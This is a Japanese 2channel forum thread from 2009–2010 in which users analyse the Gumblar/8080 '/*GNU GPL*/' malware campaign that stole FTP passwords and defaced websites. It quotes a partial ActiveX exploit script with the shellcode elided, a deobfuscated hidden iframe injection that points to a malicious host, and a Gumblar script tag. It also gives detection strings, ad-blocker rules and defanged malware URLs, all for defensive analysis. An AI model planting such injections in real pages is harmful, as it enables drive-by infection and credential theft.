81:名無しさん@お腹いっぱい。
09/12/28 02:48:53
>>79
マイクロソフトのActiveX
MS09-032あたりじゃないかな
82:名無しさん@お腹いっぱい。
09/12/28 02:53:23
>>80
ありゃ。やっぱゼロデイか。PDF切っとくか。
83:名無しさん@お腹いっぱい。
09/12/28 02:57:49
>>82
pdfupd.exeは>>81氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで
84:名無しさん@お腹いっぱい。
09/12/28 03:00:07
今回はマイクロソフトのActiveXの脆弱性を突かれてpdfupd.exeがダウンロード実行されたってこと
Adobe Readerがインストールされていれば違った攻撃もあるかも知れない
85:名無しさん@お腹いっぱい。
09/12/28 03:12:40
>>78みる限り、各ベンダー全滅、かろうじてカスペが引っかかったりしなかったりで
後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと?
86:名無しさん@お腹いっぱい。
09/12/28 03:16:04
GENO系の全てに黒画面にマウスカーソルの症状が出る訳じゃないんだけど
87:名無しさん@お腹いっぱい。
09/12/28 03:16:17
上にもあるように
ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる
AviraフリーはWebGuardが無いから注意が必要だが
88:名無しさん@お腹いっぱい。
09/12/28 03:19:08
>>78はpdfupd.exeの検出結果のみであって、どのファイル・コード・タイミング・振る舞いで検出するかもベンダーで違うだろうしなんとも言えないな
ヒューリスティックで捕まえる場合もあるだろうし
ただ
>分かり易い症状もないってこと?
これはYesって言っといた方が対策する人も増えるか?
89:87
09/12/28 03:21:34
ごめん
AviraはWebGuardじゃなくても検出するかも知れない
検証はしていないので分からない
90:名無しさん@お腹いっぱい。
09/12/28 03:24:39
>>76
WebGuardなくてもAviraで検出することを確認
91:名無しさん@お腹いっぱい。
09/12/28 03:32:43
>>24
自己レス
avast!がスクリプトに対応
/*GNU GPL*/
26日 結果: 1/41
Avast 4.8.1351.0 2009.12.27 JS:Illredir-B
URLリンク(www.virustotal.com)
92:名無しさん@お腹いっぱい。
09/12/28 03:32:56
>>76
win.jpg のvirustotalスキャン結果
URLリンク(www.virustotal.com)
93:名無しさん@お腹いっぱい。
09/12/28 03:45:55
>>91
avastは誤検出しまくってるようだが
そのせいではないの?
94:名無しさん@お腹いっぱい。
09/12/28 04:08:43
JAVAを利用した攻撃の際は
win.jpgではなくJavaGame.jarがダウンロードされる
URLリンク(www.virustotal.com)
95:94
09/12/28 04:10:59
ちなみにノートンではダウンロードしようとするときに検出するが
virustotalで検出されない
96:名無しさん@お腹いっぱい。
09/12/28 05:00:58
JAVAが無いときは
Adobe Readerも利用されるね
97:名無しさん@お腹いっぱい。
09/12/28 06:39:35
URLリンク(beatarai)●blog90.fc2●com/
avastのスレでも書かれていたけど、
このブログは大丈夫?
98:名無しさん@お腹いっぱい。
09/12/28 07:20:25
win.jpg はDirectShowのMS Video ActiveX Control(CVE-2008-0015)の脆弱性攻撃。
JavaGame.jar はJRE(CVE-2008-5353)の脆弱性攻撃。
pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。
他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop
とかで検出されるはず(でも今は全然検出してくれなぁ)のダウンローダです。
ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。
攻撃側が用意したものを何でもインストールできちゃうわけね。
実行してみれば、その時点で落ちて来るものは分かるんだろうけど。
99:名無しさん@お腹いっぱい。
09/12/28 08:37:05
何か役に立つかもしれないので報告
fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/~というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
再起動して、通常起動でウインドウを開始すると
マイクロソフトセキュリティーエッセンシャルが反応
詳しい表示は憶えてないけど、表示されたファイルの削除を選択(履歴見ても何も残っておらず詳しいことが不明)
↓
PCはそのまま使えていたので安心していたら、
出先で自分のサイトを携帯でみたらエラー500が表示されるのに気づく
↓
家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。
そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。
↓
もう1台のパソコンからFTPのパスワードなど変更
サーバー上のファイルも消去
ファイルを見るとindex.html index.php ~.jsファイルがほぼすべて最下部に/*GNU GPL*/~が埋め込まれていた。
↓
問題のPCにカスペの体験版を入れて(オンラインスキャンが停止中なので)みたら
スタートアップにsiszyd32.exeが検出されたので削除。
↓
今ここ
もうこれ再インストールするしかないんでしょうか。
100:名無しさん@お腹いっぱい。
09/12/28 08:42:16
追記
説明がわかりにくいね
自分のサイトはレンタルサーバー上にあり
FTPで更新しています。
101:名無しさん@お腹いっぱい。
09/12/28 08:47:32
>>99
感染した状態でサイト更新した?
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの?
102:名無しさん@お腹いっぱい。
09/12/28 08:58:22
>>101
レンタルサーバーは2つ借りていて
片方はWORDPRESSの管理画面からログインはした。
でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。
103:名無しさん@お腹いっぱい。
09/12/28 09:28:45
サイト閉じてとっとと再インスコしろよ…
104:名無しさん@お腹いっぱい。
09/12/28 09:41:40
>>93
webシールドで止まるようになった。
105:名無しさん@お腹いっぱい。
09/12/28 11:41:07
URLリンク(twitter.com)
いや、アンタが最初にすべきことは、自分のサイトを閉じることだろ。。
106:名無しさん@お腹いっぱい。
09/12/28 12:38:09
どもども、99です
サイトは閉めてサーバー上のファイルは全部消してるよ
今、PCの再インストール中
いらんソフトとか捨てるいいきっかけになったよ、スッキリ
107:名無しさん@お腹いっぱい。
09/12/28 14:42:08
>>106
FTPクライアントは何使ってるの?
パスワード保護に強いのはないかな?
FileZilla使ってるけど全く暗号化してないしこれ最低だよな
108:名無しさん@お腹いっぱい。
09/12/28 15:10:25
これってオンラインゲームのIDもとられるの?
109:名無しさん@お腹いっぱい。
09/12/28 15:38:16
そんなチンケな物はとらんよ、たぶん
110:名無しさん@お腹いっぱい。
09/12/28 16:35:05
>>>107
FFFTP使ってる
サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染
↓
感染に気付かずPC電源切り外出
↓
帰宅
電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。
あと、/*GNU GPL*/~というコードの最後に規則的な英数字が0~300個ずつ改行されてくっ付いてた。
一応参考までに報告
111:名無しさん@お腹いっぱい。
09/12/28 22:49:21
「思い立ったら書く日記」と「べつになんでもないこと」はググって必ずチェックすることをオススメする。
112:名無しさん@お腹いっぱい。
09/12/28 22:52:00
遠慮しとく
113:名無しさん@お腹いっぱい。
09/12/28 22:58:43
>>110
参考になった。情報サンクス。
114:名無しさん@お腹いっぱい。
09/12/29 08:46:20
感染確認に
適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな?
115:名無しさん@お腹いっぱい。
09/12/29 14:51:00
某ブログで見たが8080系はWinampの脆弱性も突くのか?
116:名無しさん@お腹いっぱい。
09/12/29 15:40:07
Winampの脆弱性ってのもよくわからないんだよな。
俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは
系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ?
117:名無しさん@お腹いっぱい。
09/12/29 16:02:10
Winampは何度か脆弱性が話題になってるよな
出来れば最新を使うか使わない方が良い
118:116
09/12/29 18:08:06
WAN接続はCDDBからの情報取得だけでファイルを直接再生することは皆無なんだけどね。
最新版への更新も検討してみるかな。
119:名無しさん@お腹いっぱい。
09/12/29 23:28:07
>>115
この辺のことか?
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***
IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性(CVE-2008-0015)搭載のwin.jpgを食わせてShellCode実行!
120:名無しさん@お腹いっぱい。
09/12/29 23:40:42
違うだろ
121:名無しさん@お腹いっぱい。
09/12/30 12:04:12
>>119
URLリンク(img51.yfrog.com)
122:名無しさん@お腹いっぱい。
09/12/30 13:24:05
このウィルスって各ベンダーのスキャンで発見できるの?
FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど
逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り
サイト改竄は免れんの?
それとも感染直後に(感染後FTP未使用でも)勝手にパス抜きされて接続、改竄なの?
123:名無しさん@お腹いっぱい。
09/12/30 15:22:39
8080用チェッカー作った
124:名無しさん@お腹いっぱい。
09/12/30 16:30:26
Gumblarは新コードのテスト中?
<script src=hhttp://「中略」.php?op=java ></script><body>
125:名無しさん@お腹いっぱい。
09/12/30 17:47:35
俺もやれたんだけど
FFFTPに登録してあるサイトが全部がやられた
接続してないサイトもやられてたから
どれか1つ接続するとリストにある奴が全部やられたってことだな
つまりこれってFFFTPがハッキングされたことになるのか?
他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが
というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら
AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから
最初の感染はローカルってことになる
pdfとか見てたからやっぱり感染元はこれっぽいな
126:名無しさん@お腹いっぱい。
09/12/30 17:58:49
感染したときに設定読み取るのかもよ
127:名無しさん@お腹いっぱい。
09/12/30 19:27:20
>>121
うっ!ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。
128:名無しさん@お腹いっぱい。
09/12/30 20:02:06
>>99見てると、UAC有効にしてても効果がないってことか
129: ◆774......E
09/12/30 22:17:20
新型8080系用のチェッカー出来たので公開してみるテスト
URLリンク(www12.atpages.jp)
130:名無しさん@お腹いっぱい。
09/12/30 23:59:28
俺はどこも信用できないね
131:名無しさん@お腹いっぱい。
09/12/31 00:57:04
>>129
せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったw
ウィルスかた思ったぜw
132:名無しさん@お腹いっぱい。
09/12/31 01:49:39
もうネットにつながないから
この脅威が去ったら電話くれ!
133:名無しさん@お腹いっぱい。
09/12/31 10:25:50
結局、感染したらFTPで鯖にファイル上げるしか確かめようは無いのか?
感染した奴は皆このルートで判明?
134: ◆774......E
09/12/31 10:40:00
>>131
ごめんなさい><文字コード指定しました
135:名無しさん@お腹いっぱい。
09/12/31 12:05:30
ここに張ってるURLは危険そうですな
136:名無しさん@お腹いっぱい。
09/12/31 12:17:02
/*GNU GPL*/踏んだ可能性があるんだけど
spoolsv.exeってのが新たに出来てる気がする
これ関係ある?
137:名無しさん@お腹いっぱい。
09/12/31 12:33:10
>>136
spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない?
138:名無しさん@お腹いっぱい。
09/12/31 13:24:17
>>137
いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで
でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか
139:名無しさん@お腹いっぱい。
09/12/31 13:38:46
>>131 乙
ついでに、Gumblarの簡易チェックも組み込めないかな?
</head><script src=URLリンク(*.php) ></script><body
これがあったら黒判定って事で。
140:名無しさん@お腹いっぱい。
09/12/31 13:41:12
>>138
サービスを殺しても生きてたら
変なのが寄生してると思われ。
141:名無しさん@お腹いっぱい。
09/12/31 14:13:43
>>138
Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。
142:138
09/12/31 16:06:59
>>140-141
Process Explorer等入れてないんで(この状況下でネットつなげないし)
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない)で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか
サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか
143:名無しさん@お腹いっぱい。
09/12/31 16:19:01
spoolsv.exeはOSにデフォルトで入ってるだろ
144:名無しさん@お腹いっぱい。
09/12/31 17:24:32
>>143
もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と(多分)違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ?
つうかPC調子悪いときに携帯規制とかキッツイ
145: ◆774......E
09/12/31 18:27:33
>>139
今回のバージョンアップの際に簡易的にチェックするようにしました。
もしかしたら誤検出があるかもしれません
>>144
別のウイルスをダウンロードしてきます。
146:名無しさん@お腹いっぱい。
09/12/31 18:28:55
どこの馬の骨だよ
147:名無しさん@お腹いっぱい。
09/12/31 20:03:18
>別のウイルスをダウンロードしてきます。
今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか
そんなのばっかりな気がするけど
/*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの?
148:名無しさん@お腹いっぱい。
09/12/31 21:21:18
紅白FLASH合戦スレで/*GNU GPL*/報告出たけどスルーされてたな
何人か開いちゃったんじゃないのあれ
149:名無しさん@お腹いっぱい。
09/12/31 22:37:48
なんかあっちこっちのスレで/*GNU GPL*/のURL貼られてる割に
いまいち騒ぎになってないよな
JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない
GENOのときはPC再起動不可っていう分かりやすい(といか致命的)エラーが出たから
皆感染が分かったけど
今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが
150:名無しさん@お腹いっぱい。
09/12/31 22:45:08
アドビ関係全部アンインスコして専ブラで2chだけを見るネット生活を八ヶ月続けてるが
それでも不安が拭えない
151:名無しさん@お腹いっぱい。
09/12/31 22:51:56
オミで/*GNU GPL*/を含むscriptタグを殺しちゃえばいいんじゃね
152:名無しさん@お腹いっぱい。
09/12/31 23:10:21
>>149
Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。
違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。
153:名無しさん@お腹いっぱい。
09/12/31 23:26:33
今回のは感染後、各ベンダーのサイトが開けなくなったとか
MSアップデートが出来なくなった、とかそういう話も聞かないよな
今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう
コレくらいしか目立った特徴は出てない気が
154:名無しさん@お腹いっぱい。
10/01/01 03:48:56
年明け早々、会社のWEBページが改ざんされたw
形態に電話があり、今から出勤、最悪。
Gumblar再開とかかいてあるし、何されてるのか。
正月休みもパーだな。
155:名無しさん@お腹いっぱい。
10/01/01 03:51:48
脆弱性対策をしててもプラウザのJavaScriptがオンなら、8080サイトからマルウェアが自動的に
ダウンロードされて、発動はしなくてもPC内に残るのかな?もしそうなら、それはそれで気持ち悪いな
156:名無しさん@お腹いっぱい。
10/01/01 04:55:50
>>154
ドンマイw
157:名無しさん@お腹いっぱい。
10/01/01 04:58:13
>>155
いや
158:名無しさん@お腹いっぱい。
10/01/01 05:31:17
Adblock Plusの存在を忘れてた・・orz
・8080
*:8080*$script,link,object
・Gumblar
*.php$script,link,object
159:名無しさん@お腹いっぱい。
10/01/01 17:36:13
スレリンク(sec板:392-405番) から。
→ URLリンク(www)●stardustpictures●co●jp/katagirihairi4/
160:名無しさん@お腹いっぱい。
10/01/01 17:56:02
カスペルスキーのオンラインウイルススキャンは現在は停止中なのかな?
161:age
10/01/01 18:02:21
某所から転載
--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
<iframe width=1 height=1 border=0 frameborder=0 src='hURLリンク(sodanthu)<)●com/cp/scripts/formmail-doc/example_src●html
因みに>>129のチェッカーはスルーする。
162:名無しさん@お腹いっぱい。
10/01/01 18:37:19
チェッカーだめじゃんw
163:名無しさん@お腹いっぱい。
10/01/01 18:43:01
>>161
カスぺは反応するが
164:名無しさん@お腹いっぱい。
10/01/01 19:12:55
>>159
30日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな?
スレ自体は直ぐに落ちた様だけど。
avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな?
先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。
165:名無しさん@お腹いっぱい。
10/01/01 19:12:58
>>110
乙です。
感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。
166:名無しさん@お腹いっぱい。
10/01/01 19:20:43
カスペのオンラインでもいまだと検出されるの?
>>160ニフの方も止まってるの?
167:名無しさん@お腹いっぱい。
10/01/01 19:24:09
>>166
ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。
168:161
10/01/01 19:48:25
"<script>function" "return String.fromCharCode(c);" "getElementById("
高確率でヒットするので、これで捜索中・・・
169:名無しさん@お腹いっぱい。
10/01/01 19:56:23
>>167
ニフの方はいけたはずだけど、中身同じじゃねえの?
170:名無しさん@お腹いっぱい。
10/01/01 21:16:49
よくよく読んでみたら、上で報告の上がってる>>99ってFFTTP起動させるまえ、
感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事?
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か
171:名無しさん@お腹いっぱい。
10/01/01 21:24:13
FFFTPだった。まあいいや
172:名無しさん@お腹いっぱい。
10/01/01 22:10:22
>>161
検索してみた
悪意のあるリンク先URLのリスト(マルウェアドメイン一覧)
URLリンク(www.itis.tw)
↑ここにリストがありますね
ホストするIP:127.0.0.1
URLリンク(www.itis.tw)←誰が作ったの?
173: ◆774......E
10/01/01 23:06:02
>>161
反応するようにしました。
174:名無しさん@お腹いっぱい。
10/01/02 05:59:43
>>172
台湾人だろ
175:名無しさん@お腹いっぱい。
10/01/02 07:38:11
GNU GPLのやつなんてファイアウォールで
アウトバウンド制御してるだけでも防げそうだけどな
感染した人は入れてないだろ
176:名無しさん@お腹いっぱい。
10/01/02 08:22:58
>>174
知らねえ奴は黙ってろ
177:名無しさん@お腹いっぱい。
10/01/02 09:40:25
>>175
そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに
178:名無しさん@お腹いっぱい。
10/01/02 10:19:30
シナの留学生が工作してるんだろw
179:名無しさん@お腹いっぱい。
10/01/02 10:27:39
中国のIP防ぐだけでもかなり安全になるよね
180:名無しさん@お腹いっぱい。
10/01/02 10:46:20
"fff=op.split(" "fff.op.replace(" の検索結果 約 14,200件
>>172
サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
URLリンク(www.itis.tw)
IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com
181:名無しさん@お腹いっぱい。
10/01/02 12:57:42
>>176
知らねえ奴は黙ってろ
182:名無しさん@お腹いっぱい。
10/01/02 20:59:02
あーわかった
FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる
だからGumblarはレジストリからFTPでアクセスする(改ざんする)サイトをみてるわ
FTPソフトってどれもレジストリいじってるのか?
てっきり普通のファイルに保存してるのかと思ってたぜ
183:名無しさん@お腹いっぱい。
10/01/02 22:07:17
FFFTPはini保存もできるし、パス抜きは普通にポート見てるだけだろ。
FTPは平文で、だからSFTP使えって話になってるんだよ。
184:名無しさん@お腹いっぱい。
10/01/02 22:24:42
>>183
知らねえ奴は黙ってろ
185:名無しさん@お腹いっぱい。
10/01/02 22:56:18
>>183
>>125の状況みるとポートだけ見てるだけではないと思うが
レジストリにFTPのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか
まあ感染してない奴が憶測で言ってもしょうがない
186:名無しさん@お腹いっぱい。
10/01/02 23:35:36
Unmask Parasites. Blog.がものすごく詳しいな。
187:名無しさん@お腹いっぱい。
10/01/03 00:33:44
うわまたきてるww
放置してたんでパス変えるの忘れてたサイトみたらやらてたw
時間は2010/01/02 23:27
やっぱ感染するとFTPのIDとパス盗まれてるわ
FTP接続しなくても改ざんされてるww
188:名無しさん@お腹いっぱい。
10/01/03 00:52:23
「F-Secure Exploit Shield 0.70 build 19」
URLリンク(www.f-secure.com)
解説サイト→URLリンク(all-freesoft.net)
XP SP3でavast!と共存させて人柱してるが、問題無く稼動中。
189:名無しさん@お腹いっぱい。
10/01/03 01:04:44
F-Secureはこれ検出すんの?
190:名無しさん@お腹いっぱい。
10/01/03 01:11:48
じゃあ、ウィルスサイト踏んでも、FTPインスコ済みID記憶済み、FTP未接続で
サイト感染が無ければ白ってことか?
191:名無しさん@お腹いっぱい。
10/01/03 01:21:48
>>189
試したところ駄目っぽい感じ
192:名無しさん@お腹いっぱい。
10/01/03 01:28:54
>>186のブログの翻訳を読んでみたが
今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ
だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも
改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな
JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ
193:名無しさん@お腹いっぱい。
10/01/03 01:30:31
何を今更
194:名無しさん@お腹いっぱい。
10/01/03 01:33:31
>>186でもの凄く詳しいな、って書いてるけど内容はその程度なのか
195:名無しさん@お腹いっぱい。
10/01/03 01:39:35
トークン認証でよくね?
196:188
10/01/03 01:42:57
よ~く見たら、ですね・・・
防いでくれてるのは
CVE-2006-3730
CVE-2007-0038
CVE-2006-4868
CVE-2006-4301
CVE-2008-3008
CVE-2006-0005
CVE-2008-4844
CVE-2009-0901
CVE-2009-0927
「CVE-2009-4324」入って無いじゃん・・・ (´・ω・`)
gred AVアクセラレータの方が良いかもしれん
197:名無しさん@お腹いっぱい。
10/01/03 01:46:57
gredなんか論外だが
aviraやavastやらでも対応は出来る
ファイアウォール程度入れとけ
198:名無しさん@お腹いっぱい。
10/01/03 01:56:00
FWで防げるのに広まってるの?
199:名無しさん@お腹いっぱい。
10/01/03 02:01:58
ファイアウォール入れとけばおかしな通信があるからすぐ分かるね
実際にこの通信がパスワードを流してるかどうかは不明だけど
間違いなくおかしいと気づく
200:名無しさん@お腹いっぱい。
10/01/03 02:11:10
多くの人が無防備ってことだろうな
MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな
201:名無しさん@お腹いっぱい。
10/01/03 02:26:14
実際のところサイト運営者以外無害なのか
おまえらサイト運営してるの?
>>187以外にいる?
202:名無しさん@お腹いっぱい。
10/01/03 02:34:14
報告にもあるとおり
Windows起動時のスタートアップに実行ファイルを登録する
その実行ファイルが通信する
その他システムの改変は今のところ俺は確認してない
しかしどんな攻撃でも可能だから注意は必要
203:188/196
10/01/03 03:02:59
>>197
PC Tools(笑)を入れてるよ
v6.0.0.86
204:名無しさん@お腹いっぱい。
10/01/03 04:34:02
Firewallのログを見ておかしな通信を見つけたところでもう遅い
その通信を止めてくれてこそ役立ったってことでしょ
だいたい警告もないのにFWのログなんて見ます?
実際には大手のサイトのWEB制作会社がFWも入れてないとは
考えられないので、FWは突破されてしまっているんでしょうね
205:名無しさん@お腹いっぱい。
10/01/03 04:36:13
最初の通信で問い合わせがあるだろ
まあ使ってるソフトにもよるがそう言うソフトを使えってこと
206:名無しさん@お腹いっぱい。
10/01/03 04:39:40
>>204
知らねえ奴は黙ってろ
君にはこれが適切
207:名無しさん@お腹いっぱい。
10/01/03 04:40:09
>>205
そういうのをセキュリティソフトに対する過信って言うんだよwww
208:名無しさん@お腹いっぱい。
10/01/03 04:41:26
試せば分かること
知らねえ奴は黙ってろ
209:名無しさん@お腹いっぱい。
10/01/03 04:43:19
>>207
書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ
210:名無しさん@お腹いっぱい。
10/01/03 04:45:16
>>208
じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ
211:名無しさん@お腹いっぱい。
10/01/03 04:47:40
>>210
このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる
212:名無しさん@お腹いっぱい。
10/01/03 04:51:38
>>211
だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ
213:名無しさん@お腹いっぱい。
10/01/03 04:55:18
初心者スレいけよ
214:名無しさん@お腹いっぱい。
10/01/03 05:00:05
なんだここは、全くの役立たずスレだな
実際にはFWが役に立っているかどうかなんて分からないくせに
いい加減なこと書き込むんじゃね~YO・・・ボケw
215:名無しさん@お腹いっぱい。
10/01/03 05:06:43
お前みたいなやつは何言っても駄目だろ
全部書いてあるって言ってるのに
だから自分で試せよ
216:名無しさん@お腹いっぱい。
10/01/03 05:09:10
>>214
質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない
217:名無しさん@お腹いっぱい。
10/01/03 05:56:43
>>204
君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159
こんなに放置されないだろ
218:名無しさん@お腹いっぱい。
10/01/03 06:06:09
>サイト管理者なんていい加減なんだろうな
だよな
はいりのとこまだ埋め込まれてるしw
あと削除してもちゃんと告知してるとこなんてわずかだろ
他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ
219:名無しさん@お腹いっぱい。
10/01/03 06:38:40
そうだな、アホなサイト管理者はたいてい
Avira AntiVir Personal+Comodo Firewall
で完璧!
これ以上のセキュリティはありませんとか信じ込んでるからなwww
220:名無しさん@お腹いっぱい。
10/01/03 06:49:09
アホなサイト管理者を叩くのはいいが何とかしてもらわないと困るのは俺らだぜw
221:186
10/01/03 10:31:55
全容が全く掴めていない感じがする。
IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。
222:名無しさん@お腹いっぱい。
10/01/03 16:38:26
シス管ってなにもできないの?
223:名無しさん@お腹いっぱい。
10/01/03 17:54:11
それなりの規模になると会社の各PCにパーソナルファイヤウォールを入れないことが多い。
シス管のPCも例外ではない。
会社のシステムでトラブルの原因になるから。
そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。
ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな
224:名無しさん@お腹いっぱい。
10/01/03 18:38:48
ローカルに保存されてるHTMLファイルを書き換えるってのは、よくある手法だけど
225:名無しさん@お腹いっぱい。
10/01/03 18:57:52
今回のGumblarの騒ぎをまとめると
最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない
発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2 >>187
この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる
でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる
こんなところだな
226:名無しさん@お腹いっぱい。
10/01/03 19:06:36
以上、古畑任三郎でした
227:名無しさん@お腹いっぱい。
10/01/03 19:40:42
要は自分が管理するFTPサーバを持たない奴は特別気にすることはないと理解していいのか?
228:名無しさん@お腹いっぱい。
10/01/03 19:53:24
今のところは
ただ言われているとおり
いつ攻撃が変わるか分からない
プログラムを実行できてしまうのでどんな攻撃も可能だから注意
229:名無しさん@お腹いっぱい。
10/01/03 21:19:51
個人用のセキュリティソフトはほとんど役に立たないで・・・FA
230:名無しさん@お腹いっぱい。
10/01/03 21:24:20
そんなことはない
231:名無しさん@お腹いっぱい。
10/01/03 21:47:44
んだんだ
脆弱性突かれているのを防ぎきれるもんではないわな
FWもやられてしまうと考えるのが普通
232:名無しさん@お腹いっぱい。
10/01/03 22:04:45
あほ
233:名無しさん@お腹いっぱい。
10/01/03 22:06:22
むしろ無知な人以外にはかなり防御しやすい攻撃
234:名無しさん@お腹いっぱい。
10/01/03 22:21:11
大騒ぎになるマルウェアって単純なやつも多いよな
P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い
